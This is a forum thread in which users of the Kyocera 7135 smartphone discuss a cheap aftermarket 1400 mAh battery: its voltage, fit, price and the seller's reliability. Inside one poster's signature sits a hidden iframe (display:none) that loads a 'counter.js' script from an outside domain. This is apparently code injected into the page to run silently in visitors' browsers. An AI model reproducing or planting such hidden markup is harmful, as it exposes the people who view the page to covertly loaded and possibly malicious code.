+ Reply to Thread

1400 mAh Battery

All,

I got the 1400 mAh that I ordered from www.eForcity.com and it is currently charging. It didn't blow up when I placed it in the cradle so hopefully everything will go as planned. Initial impressions are that it is not as well constructed as the OEM Kyo batteries. It is very plain with big bold white lettering on the back of the battery that gives it's specifications. It also says that it is for the "Qua 7135". One thing that I found interesting was that voltage is rated at 3.6 Volts, while the OEM Kyo battery is rated at 3.7 Volts. When I use Megalauncher to report the battery voltage of the OEM Kyo battery it says 100% is 4.10 Volts (I assume the phone has some sort of circuitry to step up the voltage???). I'm not certain how to test the battery either.. I mean, how can I find out if it actually has 1400 mAh? It doesn't say it on the battery anywhere. I'm open to any suggestion and will attempt to answer any questions you may have.

Byrd Dog<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    You should be 10% smarter than the equipment you operate. For some of you, the 7135 is not the best choice of equipment.

Hey Byrd Dog... is the battery the exact same size as the OEM battery or what? I would keep a close eye on it and make sure that bad boy doesn't get to hot! :b_hot
    Please visit my picture site: Robert-O-Rama :)

Well the new battery is installed and Megalauncher leads me to believe that this battery is indeed more powerful. The OEM Battery was at 100% at 4.10 volts, while the new battery maxes out at 4.18 volts. I will have to wait till tomorrow to see how this translates into real world performance. I will let everyone know tomorrow.

Byrd Dog
    You should be 10% smarter than the equipment you operate. For some of you, the 7135 is not the best choice of equipment.

My battery matches Byrd Dog's description of his, except that mine is 1200mAH. Hasn't gotten any hotter than the OEM battery.
    Ahhhh, gadgets! :bigthumb:

thanks for keeping us posted. mine is coming tomorrow.

BTW,
    www.Eforcity.com is having a 20% off sale on all merchandise, including the 1400 mHa Battery (which has been working fine all day). You just need to input the coupon code "summer"

Happy Shopping

Byrd Dog

Hmm. My standard OEM charges to 4.25v. I don't think the voltage says much. I've seen the FileZ batt percentage go down while the voltage stayed constant!

byrd, what's the verdict?

mine has been in the charger for 20 mins so far... hasn't blown up.

Ok guys,
    I've just gotten back from a hard day at work and i must say that...... I have seen absolutely no difference from the Kyocera OEM battery, Good or Bad. No heat problems or anything. The only difference I was able to tell is the price. I paid $16.95 with shipping and I must say that I'm happy with it. If you have a second battery already then don't run out and buy this one; however, if you have been looking for a second battery then this one is cheap and works fine for me. I am gonna buy another one for my wife's 7135. That would give me two extra batteries for less than what many people have paid for one.

I'm a happy camper...

Byrd Dog

the fn battery doesn't fit.

you need to have something pushing down towards the connectors. i'm tryiing to tape electrical tape to it, and it works, but makes the battery cover bulge out.

byrd, did you have this problem?

I have that issue with my OEM battery (though not w/my aftermarket one). I just took a square inch of paper towel, folded it twice, and inserted it along the top edge. Works fine, no bulge, and it's easy to re-insert whenever I need to swap batteries.

i just got that damn thing in. i mauled the thing. all the original sticker stuff is peeled off and i have patches of electrical tape all over it. all of a sudden, the fn thing clicked, and there it is, all snug and functioning. i also taped a piece of electrical tape along the top edge so it is extra snug.

thanks for the advice spikeymikey

I didn't have any problems with mine. It snapped into place perfectly.

Dunno what to tell ya.

Administrator
    welp, since these are off brands, YMMV....

seems I am seeing a lot of these batteries on ebay starting at 10 bucks. Could you tell me if any of them look like the one you purchased.

Chet

Mine looks similar, but not exact. The text color on my battery is green, and with smaller font, but otherwise, looks the same.

Byrd Dog - have you seen much difference in battery life with the 1400 mah?
    Oxo

No not really... But on the same not i have not noticed anything on the bad side either. So I think it is totally worth the $16.99 (shipping included) i paid for it.

I recommend the one from www.eforcity.com

Byrd Dog

eforcity told me today that they do not carry batteries for the 7135.
    Motomon

back
    My experience with eforcity has been all bad. Poor quality ,virtually no customer service, refund policy sucks (they don't refund shipping at all which is usually more than the item, no refunds store credit only.